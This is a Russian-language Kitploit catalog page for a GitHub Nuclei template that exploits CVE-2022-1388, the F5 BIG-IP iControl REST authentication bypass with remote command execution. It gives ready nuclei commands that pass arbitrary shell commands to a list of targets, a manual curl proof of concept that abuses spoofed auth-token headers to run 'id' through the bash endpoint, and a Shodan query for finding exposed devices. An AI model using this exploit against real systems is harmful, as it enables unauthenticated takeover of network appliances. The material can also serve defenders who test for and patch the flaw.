Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 — это уязвимость обхода аутентификации в компоненте REST API iControl BIG-IP, которой присвоен балл CVSSv3 9.8. REST API iControl используется для управления и настройки устройств BIG-IP. CVE-2022-1388 может быть использована неаутентифицированным атакующим, имеющим сетевой доступ к порту управления или собственным IP-адресам устройств, использующих BIG-IP. Эксплуатация позволила бы атакующему выполнять произвольные системные команды, создавать и удалять файлы и отключать службы. | Kitploit
Инструменты/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

Репозиторий
624 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2022-1388 — это уязвимость обхода аутентификации в компоненте REST API iControl BIG-IP, которой присвоен балл CVSSv3 9.8. REST API iControl используется для управления и настройки устройств BIG-IP. CVE-2022-1388 может быть использована неаутентифицированным атакующим, имеющим сетевой доступ к порту управления или собственным IP-адресам устройств, использующих BIG-IP. Эксплуатация позволила бы атакующему выполнять произвольные системные команды, создавать и удалять файлы и отключать службы.

Поделиться

Шаблон Nuclei для эксплуатации обхода аутентификации и удаленного выполнения команд в F5 BIG-IP iControl REST | Параметр команды

CVE-2022-1388 — это уязвимость обхода аутентификации в компоненте REST API iControl в BIG-IP, которой был присвоен показатель CVSSv3 9.8. REST API iControl используется для управления и настройки устройств BIG-IP. CVE-2022-1388 может быть использована неаутентифицированным злоумышленником, имеющим сетевой доступ к управляющему порту или собственным IP-адресам устройств, использующих BIG-IP. Эксплуатация позволяет злоумышленнику выполнять произвольные системные команды, создавать и удалять файлы, а также отключать службы.

Этот шаблон использует token-spray / переменную CLI nuclei

Этот шаблон nuclei принимает параметр оболочки для эксплуатации. Мы хотели протестировать токены, полученные из другого рабочего процесса или ручного поиска, поэтому мы использовали функцию переменной CLI nuclei для динамической передачи одного значения токена или списка токенов в эти шаблоны во время выполнения.

-V, -var value пользовательские переменные в формате var=value

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

Ручной POC

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Дополнительные сведения

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

Ссылки

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
Скачать инструмент